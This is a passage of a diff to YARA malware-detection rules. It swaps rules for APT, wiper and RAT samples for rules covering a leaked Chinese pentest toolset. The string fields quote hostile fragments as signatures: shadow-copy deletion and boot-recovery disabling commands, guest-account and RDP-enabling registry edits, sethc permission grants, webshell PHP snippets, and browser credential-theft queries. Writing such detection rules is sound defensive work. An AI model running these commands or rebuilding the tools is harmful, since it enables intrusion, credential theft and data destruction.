-		$str6 = "VU0JGVlFCRmxRQ1IwY0ZW"
-		$str7 = "QmxVUVJGVVFSSmtRRU5YUl"
-		$str8 = "JsVVFSRlVRUkprUUVOWFJW"
-		$str9 = "CbFVRUkZVUVJKa1FFTlhSV"
-		$htm = "<html" ascii
-		$eml = "Content-Transfer-Encoding:" ascii
+		$s0 = "cl -eventlog All/Application/System/Security" fullword ascii
+		$s1 = "clear iislog error!" fullword ascii
 
 	condition:
-		filesize < 10MB and ( ( 1 of ( $sd* ) and $htm and not $eml ) or ( 1 of ( $st* ) and $eml ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Mal_Dropper_Httpexe_From_CAB : FILE
+rule SIGNATURE_BASE_CN_Honker_Sqlmap_Python_Run : FILE
 {
 	meta:
-		description = "Detects a dropper from a CAB file mentioned in the article"
+		description = "Sample from CN Honker Pentest Toolset - file Run.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f67c13e9-67e7-56aa-8ced-55e9bb814971"
-		date = "2016-05-25"
+		id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L10-L25"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1930-L1946"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d114a3ab348bba49a78852b87b712908bc974bf35a2b841099a232e761cad8f2"
-		score = 60
+		hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
+		logic_hash = "86d53a06e2f71b7ce7785c4c8ac017a4552b40c16d64474db4e22dbe1afd9e52"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
 
 	strings:
-		$s1 = "029.Hdl" fullword ascii
-		$s2 = "http.exe" fullword ascii
+		$s1 = ".\\Run.log" fullword ascii
+		$s2 = "[root@Hacker~]# Sqlmap " fullword ascii
+		$s3 = "%sSqlmap %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Mal_Http_EXE : FILE
+rule SIGNATURE_BASE_CN_Honker_Saminside : FILE
 {
 	meta:
-		description = "Detects trojan from APT report named http.exe"
+		description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bcae9920-56ea-54a1-857b-70c275090e19"
-		date = "2016-05-25"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L27-L58"
+		id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1948-L1963"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e28b64bbfd2b6d40f4bd82373624d22df3d5c45c22d7155747f0ff33976207d"
-		score = 80
+		hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
+		logic_hash = "8f095a554121e16b63fdd8d47d957665aed7a2a5885813fa78bc4cee3b8923d3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
 
 	strings:
-		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
-		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
-		$x3 = "\\dumps.dat" ascii
-		$x4 = "\\wordpade.exe" ascii
-		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
-		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
-		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
-		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii
-		$s1 = "SELECT * FROM moz_logins;" fullword ascii
-		$s2 = "makescr.dat" fullword ascii
-		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
-		$s4 = "?moz-proxy://" ascii
-		$s5 = "[%s-%s] Title: %s" fullword ascii
-		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
-		$s7 = "Windows 95 SR2" fullword ascii
-		$s8 = "\\|%s|0|0|" ascii
+		$s0 = "www.InsidePro.com" fullword wide
+		$s1 = "SAMInside.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 2 of ( $s* ) ) ) or ( 3 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 650KB and all of them
 }
-rule SIGNATURE_BASE_Mal_Potplayer_DLL : FILE
+rule SIGNATURE_BASE_CN_Honker_Webscan_Wwwscan : FILE
 {
 	meta:
-		description = "Detects a malicious PotPlayer.dll"
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71d34266-63e0-5a97-9a80-952be917641a"
-		date = "2016-05-25"
+		id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L60-L77"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1965-L1981"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d1b68fa8de2e4ddfa71cbcd5e166181370172cc8a3167ade2da393e4f7998f1"
+		hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
+		logic_hash = "9d2eee1c1783a08a2eae86d4ea77bdb67db8cf0055a24d88ea09411e63018e8c"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
 
 	strings:
-		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
-		$s3 = "PotPlayer.dll" fullword ascii
-		$s4 = "\\update.dat" ascii
+		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s3 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Webmonitor_RAT : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_2_3389 : FILE
 {
 	meta:
-		description = "Detects WebMonitor RAT"
+		description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5378f22e-4bba-50e7-8374-5135e980e06b"
-		date = "2018-04-13"
+		id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_webmonitor_rat.yar#L1-L34"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1983-L1999"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fbf6368527a7bd841b7679d668d6b77ce720fd0f6bcbd5fa9ff6301ae72199ec"
-		score = 75
+		hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
+		logic_hash = "97e2a08dd391de44fc01c44ca6463aa009e93ad199a330eb99aaa809f14f2ef0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27aaad8a7b3fd53d99077a9202e8bed05696c843ed2485bea6eb9e33a1c273ac"
-		hash2 = "05111c305028b5d822ecd12de9879560223c42860cc9d448c47886c236648607"
 
 	strings:
-		$x1 = "send_keylog_stream_start" fullword wide
-		$x2 = "KEYLOG_STREAM_STOP" fullword wide
-		$s1 = "SHELL_EXEC" fullword wide
-		$s2 = "send_shell_exec" fullword wide
-		$s3 = "send_connections_get" fullword wide
-		$a1 = "Select * from Win32_PerfRawData_PerfProc_Process where IDProcess = '" fullword wide
-		$a2 = "Select * from Win32_Process WHERE handle =" fullword wide
-		$a3 = "Select * from Win32_Process where ProcessId=" fullword wide
-		$a4 = "Select * from Win32_ComputerSystem" fullword wide
-		$a5 = "The service is in the process of being continued" fullword wide
-		$a6 = "tcpdump" fullword wide
-		$a7 = "memdump" fullword wide
-		$a8 = "<val1>Processor</val1>" fullword wide
-		$a9 = "Win32 share process" fullword wide
+		$s1 = "C:\\Documents and Settings\\Administrator\\" ascii
+		$s2 = "net user guest /active:yes" fullword ascii
+		$s3 = "\\Microsoft Word.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or ( 2 of ( $s* ) and 2 of ( $a* ) ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them
 }
-rule SIGNATURE_BASE_MAL_WIPER_Bibi_Oct23 : FILE
+rule SIGNATURE_BASE_CN_Honker_PHP_Php11 : FILE
 {
 	meta:
-		description = "Detects BiBi wiper samples for Windows and Linux"
-		author = "Florian Roth"
-		id = "e1ea8016-e074-5208-8c98-54922bbcc407"
-		date = "2023-11-01"
+		description = "Sample from CN Honker Pentest Toolset - file php11.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://x.com/ESETresearch/status/1719437301900595444?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_bibi_wiper_oct23.yar#L24-L47"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2001-L2017"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c22dc994005f91f81d0e8e5f8d400b12ecd28336866bc62b8527e104f6339372"
-		score = 75
+		hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
+		logic_hash = "d32b0540521a6b1d65c224bdee463813d72846c26f27326a092bdf3b90c3ae7c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "23bae09b5699c2d5c4cb1b8aa908a3af898b00f88f06e021edcb16d7d558efad"
-		hash2 = "40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "send attempt while closed" ascii fullword
-		$s2 = "[+] CPU cores: %d, Threads: %d" ascii fullword
-		$s3 = "[+] Stats: %d | %d" ascii fullword
-		$opw1 = { 33 c0 88 45 48 b8 01 00 00 00 86 45 48 45 8b f5 48 8d 3d de f5 ff ff 0f 57 c9 f3 0f 7f 4d b8 }
-		$opw2 = { 2d ce b5 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 26 b4 00 00 44 8b 05 5f b6 00 00 e8 ca 0d 00 00 }
-		$opl1 = { 4c 8d 44 24 08 48 89 f7 48 ff c2 48 83 c6 04 e8 c7 fb ff ff 41 89 c1 0f b6 42 ff 41 0f af c1 }
-		$opl2 = { e8 6f fb ff ff 49 8d 78 f8 89 c0 48 01 c2 48 89 15 09 fb 24 00 e8 5a fb ff ff 49 8d 78 fc 6b f0 06 }
+		$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii
+		$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii
+		$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\"  Success\\n\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 4000KB and 2 of them
+		filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Andromeda_Malbot_Jun_1A : FILE
+rule SIGNATURE_BASE_CN_Honker_Webcruiserwvs : FILE
 {
 	meta:
-		description = "Detects a malicious Worm Andromeda / RETADUP"
+		description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42ee6ba3-85ea-5369-bd9b-8ffdec6e17bc"
-		date = "2017-06-30"
-		modified = "2022-12-21"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_andromeda_jun17.yar#L12-L38"
+		id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2019-L2034"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5958608ad5527628c4b6cbe08badbff39a50dcdb6cf603f6fbb5fa32ef61c0c7"
-		score = 75
+		hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
+		logic_hash = "dd37765488f07299048e9b8fc552120e76d628e0adcaf474fce9bfe60774a0c8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9"
-		hash2 = "73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98"
-		hash3 = "66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4"
-		hash4 = "42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed"
 
 	strings:
-		$x1 = "%temp%\\FolderN\\name.exe" fullword wide
-		$x2 = "%temp%\\FolderN\\name.exe.lnk" fullword wide
-		$x3 = "\\Startup\\name.exe" wide
-		$x4 = "firefox.exe.exe" fullword wide
-		$x5 = "\\Desktop\\New folder\\dark.exe" wide
-		$x6 = "\\x86\\Release\\word.pdb" ascii
-		$x7 = "\\obj\\Release\\botkill.pdb" ascii
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "svhost.exe" fullword wide
+		$s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii
+		$s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Falsefont_Backdoor_Jan24 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hookmsgina : FILE
 {
 	meta:
-		description = "Detects FalseFont backdoor, related to Peach Sandstorm APT"
-		author = "X__Junior, Jonathan Peters"
-		id = "b6a3efff-2abf-5ac1-9a2b-c7b30b51f92c"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://twitter.com/MsftSecIntel/status/1737895710169628824"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_peach_sandstorm.yar#L1-L31"
+		description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2036-L2053"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614"
-		logic_hash = "9a1b3779b63dd7fa8ddc84067dec09542518e9acebbf5d3b45cb75ec4add1158"
-		score = 80
+		hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
+		logic_hash = "1e268624a5f8df200ef1a03ce167f38feda59836a864e17297473ba223c5895a"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Agent.Core.WPF.App" ascii
-		$x2 = "3EzuNZ0RN3h3oV7rzILktSHSaHk+5rtcWOr0mlA1CUA=" wide
-		$x3 = "viOIZ9cX59qDDjMHYsz1Yw==" wide
-		$sa1 = "StopSendScreen" wide
-		$sa2 = "Decryption failed :(" wide
-		$sb1 = "{0}     {1}     {2}     {3}" wide
-		$sb2 = "\\BraveSoftware\\Brave-Browser\\User Data\\" wide
-		$sb3 = "select * from logins" wide
-		$sb4 = "Loginvault.db" wide
-		$sb5 = "password_value" wide
+		$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii
+		$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii
+		$s3 = "Global\\WinlogonHack_Load%u" fullword ascii
+		$s4 = "Hookmsgina.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or ( 1 of ( $sa* ) and 4 of ( $sb* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Xlogin_Nov24_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Xp3389 : FILE
 {
 	meta:
-		description = "Detects xlogin backdoor samples"
-		author = "Florian Roth"
-		id = "e8940660-ecf8-5616-9cb1-fc0a02d35689"
-		date = "2024-11-11"
-		modified = "2024-12-12"
-		reference = "https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_xlogin_nov24.yar#L2-L24"
+		description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2055-L2071"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "42fe8a32022592ff976d6d2839d949e28f60c8958f64a20c1c3c9091fb64d31e"
-		score = 80
+		hash = "d776eb7596803b5b94098334657667d34b60d880"
+		logic_hash = "7fd7947a802a65dfd63ece3fc6eaf2da8207e99276a9f6b1ff2c937cf4327945"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2b09a6811a9d0447f8c6480430eb0f7e3ff64fa933d0b2e8cd6117f38382cc6a"
-		hash2 = "d1cbf80786b1ca1ba2e5c31ec09159be276ad3d10fc0a8a0dbff229d8263ca0a"
-		hash3 = "ff17e9bcc1ed16985713405b95745e47674ec98e3c6c889df797600718a35b2c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 6C 6F 67 69 6E 3A 00 25 73 00 00 2F 62 69 6E 2F 73 68 00 2F 74 6D 70 2F 6C 6F 67 69 6E }
-		$s1 = "/tmp/login" ascii fullword
-		$s2 = "npxXoudifFeEgGaACSnmcs[" ascii fullword
-		$sc1 = { 28 6E 69 6C 29 00 00 00 28 6E 75 6C 6C 29 }
+		$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii
+		$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii
+		$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 500KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Destructive_Ransomware_Gen1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cookiesview : FILE
 {
 	meta:
-		description = "Detects destructive malware"
+		description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a7ce55e-fb28-577b-91bb-fe02d7b3d73c"
-		date = "2018-02-12"
+		id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_olympic_destroyer.yar#L13-L28"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2073-L2089"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f7a41c5a7e812e0e26b346cc6465290b17aff31620cbcf6e01c569d8eea2dbd"
-		score = 75
+		hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
+		logic_hash = "9711bb15f08c18ba068325d1cca0ded8e252ded4ceddfb134d1317ad8a19fbe8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85"
 
 	strings:
-		$x1 = "/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" fullword wide
-		$x2 = "delete shadows /all /quiet" fullword wide
-		$x3 = "delete catalog -quiet" fullword wide
+		$s0 = "V1.0  Http://www.darkst.com Code:New4" fullword ascii
+		$s1 = "maotpo@126.com" fullword ascii
+		$s2 = "www.baidu.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 640KB and all of them
 }
-
-rule SIGNATURE_BASE_Olympicdestroyer_Gen2 : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_LPK : FILE
 {
 	meta:
-		description = "Detects Olympic Destroyer malware"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d0cbb7b-6650-53ed-8d58-176f8b4af880"
-		date = "2018-02-12"
+		id = "808f5de2-1360-521e-8939-b759e361507c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_olympic_destroyer.yar#L30-L60"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2091-L2108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1bcf0e95d9de62271a09f6ac64ce65debc91e541e1fccfe5c31661466c00bd5e"
-		score = 75
+		hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
+		logic_hash = "a7382d61b53706ad51b36bc686a1c3f0018ee111bdc8ae9b05af144230dfbba3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016"
-		hash2 = "3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2"
-		hash3 = "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
-		hash4 = "28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc"
 
 	strings:
-		$x1 = "cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt" fullword wide
-		$x2 = "cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^(\"Scripting.FileSystemObject\"^)" wide
-		$x3 = "del %programdata%\\evtchk.txt" fullword wide
-		$x4 = "Pyeongchang2018.com\\svc_all_swd_installc" fullword ascii
-		$s1 = "<STARTCRED>" fullword wide
-		$s2 = "SELECT ds_cn FROM ds_computer" fullword wide
-		$s3 = "\\system32\\notepad.exe" wide
-		$s4 = "%s \\\\%s -u \"%s\" -p \"%s\" -accepteula -d %s %s \"%s\"" fullword ascii
+		$s1 = "http://127.0.0.1/1.exe" fullword wide
+		$s2 = "FreeHostKillexe.exe" fullword ascii
+		$s3 = "\\sethc.exe /G everyone:F" ascii
+		$s4 = "c:\\1.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "fd7200dcd5c0d9d4d277a26d951210aa" or pe.imphash ( ) == "975087e9286238a80895b195efb3968d" or pe.imphash ( ) == "da1c2d7acfe54df797bfb1f470257bc3" or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Aug25_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Scanhistory : FILE
 {
 	meta:
-		description = "Detects potential exploit for WT-2025-0050, authentication bypass through QCommand argument injection"
-		author = "X__Junior"
-		id = "b8882dcf-3b62-5b82-95ea-1953353b43ec"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L1-L14"
+		description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "85585cd2-c5ed-5465-bcac-b61211570055"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2110-L2126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5c6815a5ca3b03ef8f76ed7b378800012c763f90fcba2187bb07d81ce01d832"
-		score = 60
+		hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
+		logic_hash = "657a25b5103799446fa88abda39d36a05e080c18d41e9dd98199b506f2bfc419"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "_localadmin__"
-		$sa2 = "-localadmin"
+		$s1 = "ScanHistory.exe" fullword wide
+		$s2 = ".\\Report.dat" fullword wide
